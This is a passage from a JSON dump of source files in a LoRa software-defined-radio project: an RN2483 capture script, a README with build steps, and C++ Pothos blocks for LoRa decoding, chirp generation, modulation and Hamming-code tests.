_ws;\n\tstd::vector<uint32_t> _elements;\n};\n\nstatic Pothos::BlockRegistry registerBlockGen(\n\t\"/lora/block_gen\", &BlockGen::make);\n"
},
{
"alpha_fraction": 0.5820895433425903,
"alphanum_fraction": 0.6204690933227539,
"avg_line_length": 26.861385345458984,
"blob_id": "1e5fdb0d17407433def6cea79db4078598ad69be",
"content_id": "245f27e68229c8c1a23f6c4ca8286fb9f748711f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2814,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 101,
"path": "/RN2483Capture.py",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys\nimport math\nimport cmath\nimport wave\nimport scipy.signal\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport SoapySDR\nfrom SoapySDR import *\nimport RN2483\n\nSDR_ARGS = 'driver=rtlsdr'\nSDR_RATE = 2*1024e3\nSDR_THRESH = 0.01\nTTY_PORT = '/dev/ttyACM0'\nFREQ = 868.1e6\nBW = 250e3\nSF = 8\nRDD = 4\nSYNC = 0x83\n\ndef transmitAndCollect(rn2483, sdr, rxStream, payload):\n \"\"\"\n Transmit the specified payload over the RN2483\n and receive through the RTLSDR device.\n \\return a numpy array with LoRa samples\n \"\"\"\n buff = np.array([0]*1024, np.complex64)\n\n #flush\n while True:\n sr = sdr.readStream(rxStream, [buff], len(buff))\n if sr.ret == SOAPY_SDR_TIMEOUT: break\n\n sdr.activateStream(rxStream) #start streaming\n\n for i in range(16):\n sdr.readStream(rxStream, [buff], len(buff))\n\n rn2483.transmit(payload)\n\n #receive some samples\n loraSamples = np.array([])\n while True:\n sr = sdr.readStream(rxStream, [buff], len(buff))\n assert(sr.ret > 0)\n found = np.std(buff) > SDR_THRESH\n if not found and not loraSamples.size: continue\n loraSamples = np.concatenate((loraSamples, buff))\n if not found: break\n\n sdr.deactivateStream(rxStream) #stop streaming\n\n return loraSamples\n\nif __name__ == '__main__':\n\n ####################################################################\n #connect to devices\n rn2483 = RN2483.RN2483(TTY_PORT)\n rn2483.configLoRa(freq=FREQ,\n bw=int(BW/1e3),\n crc='off',\n cr='4/%d'%(RDD + 4),\n sf='sf%d'%SF,\n sync=SYNC)\n\n sdr = SoapySDR.Device(SDR_ARGS)\n sdr.setFrequency(SOAPY_SDR_RX, 0, FREQ)\n sdr.setSampleRate(SOAPY_SDR_RX, 0, SDR_RATE)\n rxStream = sdr.setupStream(SOAPY_SDR_RX, SOAPY_SDR_CF32)\n\n ####################################################################\n #collect data and plot\n loraSamples = transmitAndCollect(rn2483, sdr, rxStream, ''.join([chr(0xff)]*8))\n print(\"Found %d samples\"%loraSamples.size)\n\n loraSamples = loraSamples[15000:25000] #just a few for plotting purposes\n resampled = scipy.signal.resample(loraSamples, int(BW*loraSamples.size/SDR_RATE))\n fmdemodResamp = np.angle(resampled[1:] * np.conj(resampled)[:-1])\n\n fig = plt.figure(figsize=(40, 10))\n fig.suptitle('Extracted samples', fontsize=12)\n\n ax = fig.add_subplot(1, 1, 1)\n ax.set_title('Raw content')\n ax.plot(np.arange(0, resampled.size, 1), np.real(resampled))\n ax.plot(np.arange(0, resampled.size, 1), np.imag(resampled))\n ax.plot(np.arange(0, fmdemodResamp.size, 1), fmdemodResamp)\n ax.grid(True)\n\n outPath = '/tmp/out.png'\n print(\"Writing plot to %s\"%outPath)\n fig.savefig(outPath)\n plt.close(fig)\n\n sdr.closeStream(rxStream)\n print(\"Done!\")\n exit(0)\n"
},
{
"alpha_fraction": 0.7407827377319336,
"alphanum_fraction": 0.760635256767273,
"avg_line_length": 28.88135528564453,
"blob_id": "c32214951a55bd7a8517a930aa73520fce77785d",
"content_id": "1bc2c76ccfa97855bd7175f90627581e2bfafaa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1763,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 59,
"path": "/README.md",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "# LoRa SDR project\n\nThis project will make use of SDR hardware to receive and decode Lora.\n\n* Blog: https://myriadrf.org/blog/lora-modem-limesdr/\n\n## Repository layout\n\n* LoRa*.cpp - Pothos processing blocks and unit tests\n* RN2483.py - python utility for controlling the RN2483\n* examples/ - saved Pothos topologies with LoRa blocks\n\n## Noise simulation\n\nThis example demonstrates the LoRa PHY blocks\nusing a looback path in the presence of noise.\n\n* examples/lora_simulation.pth - modem simulation\n\n## RN2483 receiver\n\nThis example receives and demodulates raw symbols\nwith logic analyzer plot to view the symbols\nand triggered waveform plots to view the input.\nOnce the example is activated, simply run the RN2483.py\nscript to generate a single waveform to trigger the plots.\n\n* RN2483.py --freq=863.1e6 --bw=0.5e6 --sf=11 --tx=\"hello\"\n* examples/rx_RN2483.pth\n\n## Simple relay\n\nThis example includes a simple client and relay app.\nThe relay receives and decodes messages and\nrelays them into another frequency and sync word.\nThe client can post messages to the relay\nand view the response in a chat box widget.\n\n* examples/lora_sdr_relay.pth - LimeSDR LoRa relay\n* examples/lora_sdr_client.pth - LimeSDR LoRa client\n\n## Building project\n\n* First install Pothos: https://github.com/pothosware/pothos/wiki \n* Install [Poco](https://pocoproject.org/) development files\n * E.g. on Ubuntu: `sudo apt-get install libpoco-doc libpoco-dev`\n* Install [JSON for Modern C++](https://github.com/nlohmann/json) development files\n * E.g. on Ubuntu: `sudo apt-get install -y nlohmann-json-dev`\n* Finally, build the blocks in this repository:\n\n```\ngit clone https://github.com/myriadrf/LoRa-SDR.git\ncd LoRa-SDR\nmkdir build\ncd build\ncmake ../\nmake -j4\nsudo make install\n```\n"
},
{
"alpha_fraction": 0.5875654220581055,
"alphanum_fraction": 0.6084949374198914,
"avg_line_length": 29.86935806274414,
"blob_id": "42383192f957c62464fb4316303b44a0e75b3835",
"content_id": "b3141e9dc0bb96eceb1b366fc56346d1e1e03ff0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 12996,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 421,
"path": "/LoRaDecoder.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// Copyright (c) 2016-2016 Arne Hennig\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <cstring>\n#include \"LoRaCodes.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Decoder\n *\n * Decode LoRa modulation symbols into output bytes.\n * This is a simple decoder and does not offer many options.\n * The job of the decoder is to gray encode to convert measurement error\n * into bit errors, deinterleave, handle error correction, and descramble.\n *\n * <h2>Input format</h2>\n *\n * A packet message with a payload containing LoRa modulation symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Output format</h2>\n *\n * A packet message with a payload containing bytes received.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor sets the bits per symbol.\n * |default 10\n *\n * |param ppm[Symbol size] The size of the symbol set (_ppm <= SF).\n * Specify _ppm less than the spread factor to use a reduced symbol set.\n * The special value of zero uses the full symbol set (PPM == SF).\n * |default 0\n * |option [Full set] 0\n * |widget ComboBox(editable=true)\n * |preview valid\n *\n * |param cr[Coding Rate] The number of error correction bits.\n * |option [4/4] \"4/4\"\n * |option [4/5] \"4/5\"\n * |option [4/6] \"4/6\"\n * |option [4/7] \"4/7\"\n * |option [4/8] \"4/8\"\n * |default \"4/8\"\n *\n * |param explicit Enable/disable explicit header mode.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param hdr[Header Output] Enable/disable header output.\n * |option [On] true\n * |option [Off] false\n * |default false\n *\n * |param dataLength implicit data length.\n * |default 8\n *\n * |param crcc Enable/disable crc check of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default false\n *\n * |param whitening Enable/disable whitening of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param interleaving Enable/disable interleaving of the decoded message.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |param errorCheck Enable/disable error checking.\n * |option [On] true\n * |option [Off] false\n * |default true\n *\n * |factory /lora/lora_decoder()\n * |setter setSpreadFactor(sf)\n * |setter setSymbolSize(ppm)\n * |setter setCodingRate(cr)\n * |setter enableExplicit(explicit)\n * |setter enableHdr(hdr)\n * |setter setDataLength(dataLength)\n * |setter enableCrcc(crcc)\n * |setter enableWhitening(whitening)\n * |setter enableInterleaving(interleaving)\n * |setter enableErrorCheck(errorCheck)\n **********************************************************************/\nclass LoRaDecoder : public Pothos::Block\n{\npublic:\n LoRaDecoder(void):\n _sf(10),\n _ppm(0),\n _rdd(4),\n _whitening(true),\n\t\t_crcc(false),\n\t\t_interleaving(true),\n\t\t_errorCheck(false),\n\t\t_explicit(true),\n _hdr(false),\n\t\t_dataLength(8),\n _dropped(0)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setSpreadFactor));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setSymbolSize));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setCodingRate));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableWhitening));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableCrcc));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableInterleaving));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableExplicit));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableHdr));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, setDataLength));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, enableErrorCheck));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDecoder, getDropped));\n\n this->registerSignal(\"dropped\");\n this->setupInput(\"0\");\n this->setupOutput(\"0\");\n }\n\n static Block *make(void)\n {\n return new LoRaDecoder();\n }\n\n void setSpreadFactor(const size_t sf)\n {\n _sf = sf;\n }\n\n void setSymbolSize(const size_t ppm)\n {\n _ppm = ppm;\n }\n\n void setCodingRate(const std::string &cr)\n {\n if (cr == \"4/4\") _rdd = 0;\n else if (cr == \"4/5\") _rdd = 1;\n else if (cr == \"4/6\") _rdd = 2;\n else if (cr == \"4/7\") _rdd = 3;\n else if (cr == \"4/8\") _rdd = 4;\n else throw Pothos::InvalidArgumentException(\"LoRaDecoder::setCodingRate(\"+cr+\")\", \"unknown coding rate\");\n }\n\n void enableWhitening(const bool whitening)\n {\n _whitening = whitening;\n }\n\n\tvoid enableInterleaving(const bool interleaving)\n\t{\n\t\t_interleaving = interleaving;\n\t}\n\n\tvoid enableExplicit(const bool __explicit) {\n\t\t_explicit = __explicit;\n\t}\n \n void enableHdr(const bool hdr) {\n _hdr = hdr;\n }\n\n\tvoid enableErrorCheck(const bool errorCheck) {\n\t\t_errorCheck = errorCheck;\n\t}\n\n\tvoid enableCrcc(const bool crcc)\n\t{\n\t\t_crcc = crcc;\n\t}\n\n\tvoid setDataLength(const size_t dataLength)\n\t{\n\t\t_dataLength = dataLength;\n\t}\n\n unsigned long long getDropped(void) const\n {\n return _dropped;\n }\n\n void activate(void)\n {\n _dropped = 0;\n this->emitSignal(\"dropped\", _dropped);\n }\n\n\tvoid work(void){\n\t\tauto inPort = this->input(0);\n\t\tauto outPort = this->output(0);\n\t\tif (not inPort->hasMessage()) return;\n\n\t\tconst size_t PPM = (_ppm == 0) ? _sf : _ppm;\n\t\tif (PPM > _sf) throw Pothos::Exception(\"LoRaDecoder::work()\", \"failed check: PPM <= SF\");\n\n\t\t//extract the input symbols\n\t\tauto msg = inPort->popMessage();\n\t\tauto pkt = msg.extract<Pothos::Packet>();\n \n if (pkt.payload.elements() < N_HEADER_SYMBOLS) return; // need at least a header\n \n\t\tconst size_t numSymbols = roundUp(pkt.payload.elements(), 4 + _rdd);\n\t\tconst size_t numCodewords = (numSymbols / (4 + _rdd))*PPM;\n\t\tstd::vector<uint16_t> symbols(numSymbols);\n\t\tstd::memcpy(symbols.data(), pkt.payload.as<const void *>(), pkt.payload.length);\n\n int rdd = _rdd; //make a copy to be changed in header decode\n\n\t\t//gray encode, when SF > PPM, depad the LSBs with rounding\n\t\tfor (auto &sym : symbols){\n\t\t\tsym += (1 << (_sf - PPM)) / 2; //increment by 1/2\n\t\t\tsym >>= (_sf - PPM); //down shift to PPM bits\n\t\t\tsym = binaryToGray16(sym);\n\t\t}\n\t\t//deinterleave / dewhiten the symbols into codewords\n\t\tstd::vector<uint8_t> codewords(numCodewords);\n\t\tif (_interleaving) {\n\t\t\tsize_t sOfs = 0;\n\t\t\tsize_t cOfs = 0;\n\t\t\tif (rdd != HEADER_RDD) {\n\t\t\t\tdiagonalDeterleaveSx(symbols.data(), N_HEADER_SYMBOLS, codewords.data(), PPM, HEADER_RDD);\n\t\t\t\tif (_explicit) {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + N_HEADER_CODEWORDS, PPM - N_HEADER_CODEWORDS, 0, HEADER_RDD);\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data(), PPM, 0, HEADER_RDD);\n\t\t\t\t}\n\t\t\t\tcOfs += PPM;\n\t\t\t\tsOfs += N_HEADER_SYMBOLS;\n\t\t\t\tif (numSymbols - sOfs > 0) {\n\t\t\t\t\tdiagonalDeterleaveSx(symbols.data() + sOfs, numSymbols-sOfs, codewords.data() + cOfs, PPM, rdd);\n\t\t\t\t\tif (_explicit) {\n\t\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + cOfs, numCodewords - cOfs, PPM-N_HEADER_CODEWORDS, rdd);\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data() + cOfs, numCodewords - cOfs, PPM, rdd);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\tdiagonalDeterleaveSx(symbols.data(), numSymbols, codewords.data(), PPM, rdd);\n\t\t\t\tif (_explicit) {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data()+N_HEADER_CODEWORDS, numCodewords-N_HEADER_CODEWORDS, 0, rdd);\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\tSx1272ComputeWhiteningLfsr(codewords.data(), numCodewords, 0, rdd);\n\t\t\t\t}\n\t\t\t}\n\t\t/*\n\t\t\tPothos::Packet out;\n\t\t\tout.payload = Pothos::BufferChunk(typeid(uint8_t), numCodewords);\n\t\t\tstd::memcpy(out.payload.as<void *>(), codewords.data(), numCodewords);\n\t\t\toutPort->postMessage(out);\n\t\t\treturn;\n\t\t*/\n\t\t}\n\t\telse {\n\t\t\tPothos::Packet out;\n\t\t\tout.payload = Pothos::BufferChunk(typeid(uint16_t), numSymbols);\n\t\t\tstd::memcpy(out.payload.as<void *>(), symbols.data(), out.payload.length);\n\t\t\toutPort->postMessage(out);\n\t\t\treturn;\n\t\t}\n\n\t\tbool error = false;\n\t\tbool bad = false;\n\t\tstd::vector<uint8_t> bytes((codewords.size()+1) / 2);\n\t\tsize_t dOfs = 0;\n\t\tsize_t cOfs = 0;\n \n size_t packetLength = 0;\n size_t dataLength = 0;\n bool checkCrc = _crcc;\n\t\t\n\t\tif (_explicit) {\n\t\t\tbytes[0] = decodeHamming84sx(codewords[1], error, bad) & 0xf;\n\t\t\tbytes[0] |= decodeHamming84sx(codewords[0], error, bad) << 4;\t// length\n\n\t\t\tbytes[1] = decodeHamming84sx(codewords[2], error, bad) & 0xf;\t// coding rate and crc enable\n\n\t\t\tbytes[2] = decodeHamming84sx(codewords[4], error, bad) & 0xf;\n\t\t\tbytes[2] |= decodeHamming84sx(codewords[3], error, bad) << 4;\t// checksum\n\t\t\t\n\t\t\tbytes[2] ^= headerChecksum(bytes.data());\n\n\t\t\tif (error && _errorCheck) return this->drop();\n \n if (0 == (bytes[1] & 1)) checkCrc = false;\t// disable crc check if not present in the packet\n rdd = (bytes[1] >> 1) & 0x7;\t\t\t\t// header contains error correction info\n if (rdd > 4) return this->drop();\n \n packetLength = bytes[0];\n dataLength = packetLength + ((bytes[1] & 1)?5:3); // include header and crc\n \n\t\t\tcOfs = N_HEADER_CODEWORDS;\n\t\t\tdOfs = 6;\n }else{\n packetLength = _dataLength;\n if (_crcc){\n dataLength = packetLength + 2;\n }else{\n dataLength = packetLength;\n }\n }\n \n if (dataLength > bytes.size()) return this->drop();\n\t\t\n\t\tfor (; cOfs < PPM; cOfs++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming84sx(codewords[cOfs], error, bad) << 4;\n\t\t\telse\n\t\t\t\tbytes[dOfs >> 1] = decodeHamming84sx(codewords[cOfs], error, bad) & 0xf;\n\t\t}\n\n\t\tif (dOfs & 1) {\n\t\t\tif (rdd == 0){\n\t\t\t\tbytes[dOfs>>1] |= codewords[cOfs++] << 4;\n\t\t\t}\n\t\t\telse if (rdd == 1){\n\t\t\t\tbytes[dOfs >> 1] |= checkParity54(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 2) {\n\t\t\t\tbytes[dOfs >> 1] |= checkParity64(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 3){\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming74sx(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 4){\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming84sx(codewords[cOfs++], error, bad) << 4;\n\t\t\t}\n\t\t\tdOfs++;\n\t\t}\n\t\tdOfs >>= 1;\n\n\t\tif (error && _errorCheck) return this->drop();\n\n\n\t\t//decode each codeword as 2 bytes with correction\n\t\tif (rdd == 0) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = codewords[cOfs++] & 0xf;\n\t\t\tbytes[i] |= codewords[cOfs++] << 4;\n\t\t}else if (rdd == 1) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = checkParity54(codewords[cOfs++],error);\n\t\t\tbytes[i] |= checkParity54(codewords[cOfs++], error) << 4;\n\t\t}else if (rdd == 2) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = checkParity64(codewords[cOfs++], error);\n\t\t\tbytes[i] |= checkParity64(codewords[cOfs++],error) << 4;\n\t\t}else if (rdd == 3) for (size_t i = dOfs; i < dataLength; i++){\n\t\t\tbytes[i] = decodeHamming74sx(codewords[cOfs++], error) & 0xf;\n\t\t\tbytes[i] |= decodeHamming74sx(codewords[cOfs++], error) << 4;\n\t\t}else if (rdd == 4) for (size_t i = dOfs; i < dataLength; i++){\n\t\t\tbytes[i] = decodeHamming84sx(codewords[cOfs++], error, bad) & 0xf;\n\t\t\tbytes[i] |= decodeHamming84sx(codewords[cOfs++], error, bad) << 4;\n\t\t}\n\t\t\n\t\tif (error && _errorCheck) return this->drop();\n \n dOfs = 0;\n \n\t\tif (_explicit) {\n\t\t\tif (bytes[1] & 1) {\t\t\t\t\t\t\t// always compute crc if present\n\t\t\t\tuint16_t crc = sx1272DataChecksum(bytes.data() + 3, packetLength);\n\t\t\t\tuint16_t packetCrc = bytes[3 + packetLength] | (bytes[4 + packetLength] << 8);\n\t\t\t\tif (crc != packetCrc && checkCrc) return this->drop();\n\t\t\t\tbytes[3 + packetLength] ^= crc;\n\t\t\t\tbytes[4 + packetLength] ^= (crc >> 8);\n\t\t\t}\n if (!_hdr){\n dOfs = 3;\n dataLength -= 5;\n }\n\t\t}\n\t\telse {\n if (checkCrc) {\n uint16_t crc = sx1272DataChecksum(bytes.data(), _dataLength);\n uint16_t packetCrc = bytes[_dataLength] | (bytes[_dataLength + 1] << 8);\n if (crc != packetCrc) return this->drop();\n bytes[_dataLength + 0] ^= crc;\n bytes[_dataLength + 1] ^= (crc >> 8);\n }\n\t\t}\n\t\t\n\t\t//post the output bytes\n\t\tPothos::Packet out;\n\t\tout.payload = Pothos::BufferChunk(typeid(uint8_t), dataLength);\n\t\tstd::memcpy(out.payload.as<void *>(), bytes.data()+dOfs, out.payload.length);\n\t\toutPort->postMessage(out);\n\t\treturn;\n\n }\n\nprivate:\n\n void drop(void)\n {\n _dropped++;\n this->emitSignal(\"dropped\", _dropped);\n }\n\n size_t _sf;\n size_t _ppm;\n size_t _rdd;\n bool _whitening;\n\tbool _crcc;\n\tbool _interleaving;\n\tbool _errorCheck;\n\tbool _explicit;\n bool _hdr;\n\tsize_t _dataLength;\n unsigned long long _dropped;\n};\n\nstatic Pothos::BlockRegistry registerLoRaDecoder(\n \"/lora/lora_decoder\", &LoRaDecoder::make);\n"
},
{
"alpha_fraction": 0.5664089918136597,
"alphanum_fraction": 0.5790583491325378,
"avg_line_length": 29.276596069335938,
"blob_id": "395ce3006617a05649a3011709c33a131a5729a2",
"content_id": "9df2fdefd9109962226dd224af0685acb69e78d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1423,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 47,
"path": "/ChirpGenerator.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#pragma once\n#include <Pothos/Config.hpp>\n#include <complex>\n#include <cmath>\n\n/*!\n * Generate a chirp\n * \\param [out] samps pointer to the output samples\n * \\param N samples per chirp sans the oversampling\n * \\param ovs the oversampling size\n * \\param NN the number of samples to generate\n * \\param f0 the phase offset/transmit symbol\n * \\param down true for downchirp, false for up\n * \\param ampl the chrip amplitude\n * \\param [inout] phaseAccum running phase accumulator value\n * \\return the number of samples generated\n */\ntemplate <typename Type>\nint genChirp(std::complex<Type> *samps, int N, int ovs, int NN, Type f0, bool down, const Type ampl, Type &phaseAccum)\n{\n const Type fMin = -M_PI / ovs;\n const Type fMax = M_PI / ovs;\n const Type fStep = (2 * M_PI) / (N * ovs * ovs);\n float f = fMin + f0;\n int i;\n if (down) {\n for (i = 0; i < NN; i++) {\n f += fStep;\n if (f > fMax) f -= (fMax - fMin);\n phaseAccum -= f;\n samps[i] = std::polar(ampl, phaseAccum);\n }\n }\n else {\n for (i = 0; i < NN; i++) {\n f += fStep;\n if (f > fMax) f -= (fMax - fMin);\n phaseAccum += f;\n samps[i] = std::polar(ampl, phaseAccum);\n }\n }\n phaseAccum -= floor(phaseAccum / (2 * M_PI)) * 2 * M_PI;\n return i;\n}\n"
},
{
"alpha_fraction": 0.5156172513961792,
"alphanum_fraction": 0.5518096089363098,
"avg_line_length": 27.408451080322266,
"blob_id": "f1a93aa2117975ffd6951762242a31b840fe3368",
"content_id": "c9c2f043c76a1f074ebb96476ff7333cfbd1ced6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2017,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 71,
"path": "/TestHamming.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming84)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 84 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming84sx(byte);\n\n //check no bit errors\n error = false;\n decoded = decodeHamming84sx(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n error = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming84sx(encoded1err, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit1 = 0; bit1 < 8; bit1++)\n {\n if (bit1 == bit0) continue;\n\n //check 2 bit errors (cant correct, but can detect\n error = false;\n unsigned char encoded2err = encoded1err ^ (1 << bit1);\n decoded = decodeHamming84sx(encoded2err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming74)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 74 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming74sx(byte);\n\n //check no bit errors\n decoded = decodeHamming74sx(encoded);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming74sx(encoded1err);\n POTHOS_TEST_EQUAL(byte, decoded);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.4460259675979614,
"alphanum_fraction": 0.45798224210739136,
"avg_line_length": 30.252668380737305,
"blob_id": "270173493b63ff009559d0a67bca4808c82e7068",
"content_id": "126b00718229245dda91f18d0faf82bb5dc5023b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8782,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 281,
"path": "/LoRaMod.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include \"ChirpGenerator.hpp\"\n#include <iostream>\n#include <complex>\n#include <cmath>\n\n/***********************************************************************\n * |PothosDoc LoRa Mod\n *\n * Modulate LoRa packets from symbols into a complex sample stream.\n *\n * <h2>Input format</h2>>\n *\n * The input port 0 accepts a packet containing pre-modulated symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Output format</h2>\n *\n * The output port 0 produces a complex sample stream of modulated chirps\n * to be transmitted at the specified bandwidth and carrier frequency.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor controls the symbol spread.\n * Each symbol will occupy 2^SF number of samples given the waveform BW.\n * |default 10\n *\n * |param sync[Sync word] The sync word is a 2-nibble, 2-symbol sync value.\n * The sync word is encoded after the up-chirps and before the down-chirps.\n * |default 0x12\n *\n * |param padding[Padding] Pad out the end of a packet with zeros.\n * This is mostly useful for simulation purposes, though some padding\n * may be desirable to flush samples through the radio transmitter.\n * |units symbols\n * |default 1\n *\n * |param ampl[Amplitude] The digital transmit amplitude.\n * |default 0.3\n *\n * |param ovs[Oversampling ratio] The oversampling ratio.\n * |default 1\n *\n * |factory /lora/lora_mod(sf)\n * |initializer setOvs(ovs)\n * |setter setSync(sync)\n * |setter setPadding(padding)\n * |setter setAmplitude(ampl)\n **********************************************************************/\nclass LoRaMod : public Pothos::Block\n{\npublic:\n\tLoRaMod(const size_t sf) :\n\t\tN(1 << sf),\n\t\t_ovs(1),\n\t\t_sync(0x12),\n\t\t_padding(1),\n\t\t_ampl(0.3f)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setSync));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setPadding));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setAmplitude));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setOvs));\n this->setupInput(0);\n this->setupOutput(0, typeid(std::complex<float>));\n\t\t_phaseAccum = 0;\n }\n\n static Block *make(const size_t sf)\n {\n return new LoRaMod(sf);\n }\n\n void setSync(const unsigned char sync)\n {\n _sync = sync;\n }\n\n void setPadding(const size_t padding)\n {\n _padding = padding;\n }\n\n void setAmplitude(const float ampl)\n {\n _ampl = ampl;\n }\n\n\tvoid setOvs(const size_t ovs)\n\t{\n\t\tif (ovs < 1 || ovs > 256) {\n\t\t\tthrow Pothos::InvalidArgumentException(\"LoRaDecoder::setOvs(\" + std::to_string(ovs) + \")\", \"invalid oversampling ratio\");\n\t\t}\n\t\telse {\n\t\t\t_ovs = ovs;\n\t\t}\n\t}\n\n void activate(void)\n {\n _state = STATE_WAITINPUT;\n }\n\n void work(void)\n {\n auto outPort = this->output(0);\n //float freq = 0.0;\n const size_t NN = N * _ovs;\n auto samps = outPort->buffer().as<std::complex<float> *>();\n size_t i = 0;\n\n //std::cout << \"mod state \" << int(_state) << std::endl;\n switch (_state)\n {\n ////////////////////////////////////////////////////////////////\n case STATE_WAITINPUT:\n ////////////////////////////////////////////////////////////////\n {\n\t\t\tif (not this->input(0)->hasMessage()) {\n\t\t\t\t//for (i = 0; i < N; i++){\n\t\t\t\t\t//samps[i] = 0;\n\t\t\t\t//}\n\t\t\t\t//outPort->produce(i);\n\t\t\t\treturn;\n\t\t\t}\n auto msg = this->input(0)->popMessage();\n auto pkt = msg.extract<Pothos::Packet>();\n _payload = pkt.payload;\n _state = STATE_FRAMESYNC;\n _counter = 10;\n _phaseAccum = 0;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_FRAMESYNC:\n ////////////////////////////////////////////////////////////////\n {\n _counter--;\n i = genChirp(samps, N, _ovs, NN, 0.0f, false, _ampl, _phaseAccum);\n if 